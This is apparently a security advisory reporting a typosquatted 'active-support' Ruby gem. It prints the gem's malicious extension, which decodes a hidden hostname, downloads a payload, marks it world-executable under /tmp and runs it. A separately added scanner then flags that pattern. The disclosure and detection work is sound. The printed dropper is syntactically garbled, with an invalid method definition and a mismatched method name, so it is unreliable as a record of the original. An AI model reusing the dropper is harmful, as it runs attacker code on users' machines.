RubyGems: Malware in `active-support` gem

ID H1:392311
Type hackerone
Reporter reed
Modified 2018-08-09T18:14:31


This was sent to RubySec:

The gem duplicates the official activesupport (no hyphen) code but adds a compiled extension. The extension attempts to resolve a base64-encoded domain, downloads a payload from the resolved host, and executes it.


```ruby
require 'net/http'
require 'uri'
require 'base64'
require 'resolv'

class Smectis
  def self.install_explot(weighership)
    if !weighership.nil? and weighership != ''
      # fetch the second-stage payload from the resolved host
      educable = Net::HTTP.get_response(URI('http://' + weighership + '/mimming'))
      # write it under /tmp, mark it world-executable and run it
      File.open('/tmp/autosymbiontic', 'wb+') do |uterometer|
        uterometer.binmode
        uterometer.write(educable.body)
        uterometer.chmod(0777)
        uterometer.close
      end
      system('/tmp/autosymbiontic')
    end
  end

  # the name of this method did not survive in the report as published
  def milligram = 'MjlmYWVhNjMucGxhbmZobnRhZ2UuZGU='
    jaunting = nil
    begin
      # resolve the base64-encoded hostname; any lookup failure is silently swallowed
      jaunting = Resolv.getaddress(Base64.decode64(milligram))
    rescue
    end
    # note: the method is defined above as install_explot, called here as install_exploit
    self.install_exploit(jaunting)
  end
end
```


Run arbitrary code on a victim's machine.
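As an added defender-side example (not part of the report or of any RubySec tooling), a small Ruby heuristic that flags gem source showing the dropper pattern described above: a quoted base64 literal that decodes to a hostname, a DNS lookup, an HTTP fetch, a world-executable file under /tmp and a `system()` call. The patterns, thresholds, function names and both embedded samples are constructed for this example.

```ruby
require 'base64'

# Heuristics modelled on the dropper above. Names, patterns and samples are
# constructed for this example; the threshold is illustrative, not a real tool.
SUSPICIOUS_CALLS = {
  'dns_lookup' => /Resolv\.getaddress/,
  'http_fetch' => /Net::HTTP\.get_response/,
  'tmp_write'  => %r{['"]/tmp/[^'"]+['"]},
  'world_exec' => /chmod\(0?777\)/,
  'shell_exec' => /\bsystem\(/
}.freeze
BASE64_LITERAL = %r{['"]([A-Za-z0-9+/]{16,}={0,2})['"]}
HOSTNAME       = /\A[a-z0-9-]+(\.[a-z0-9-]+)*\.[a-z]{2,}\z/i
# Return every quoted base64 literal in +src+ that decodes to a hostname.
def decoded_hostnames(src)
  src.scan(BASE64_LITERAL).flatten.map do |lit|
    begin
      plain = Base64.strict_decode64(lit)
    rescue ArgumentError
      next nil # not valid base64 after all
    end
    plain if plain.ascii_only? && plain.match?(HOSTNAME)
  end.compact
end

# Score one source file: which dropper indicators appear, and any hidden hosts.
def scan_gem_source(src)
  indicators = SUSPICIOUS_CALLS.select { |_, re| src.match?(re) }.keys
  hosts = decoded_hostnames(src)
  verdict = (indicators.size >= 3 || !hosts.empty?) ? :suspicious : :clean
  { indicators: indicators, hosts: hosts, verdict: verdict }
end

# Constructed sample shaped like the reported extension (example.invalid is a
# reserved test domain; 'ZXhhbXBsZS5pbnZhbGlk' is its base64 form).
SAMPLE_DROPPER = <<~RUBY
  addr = Resolv.getaddress(Base64.decode64('ZXhhbXBsZS5pbnZhbGlk'))
  r = Net::HTTP.get_response(URI('http://' + addr + '/payload'))
  File.open('/tmp/stage', 'wb+') { |f| f.write(r.body); f.chmod(0777) }
  system('/tmp/stage')
RUBY

# Constructed benign sample: ordinary library code with no indicators.
SAMPLE_BENIGN = <<~RUBY
  module ActiveSupport
    def self.camelize(s); s.split('_').map(&:capitalize).join; end
  end
RUBY
puts scan_gem_source(SAMPLE_DROPPER).inspect if __FILE__ == $0
```

Run it over the `lib/` and `ext/` trees of an installed gem to triage; a hit is a reason to read the file, not a conviction on its own.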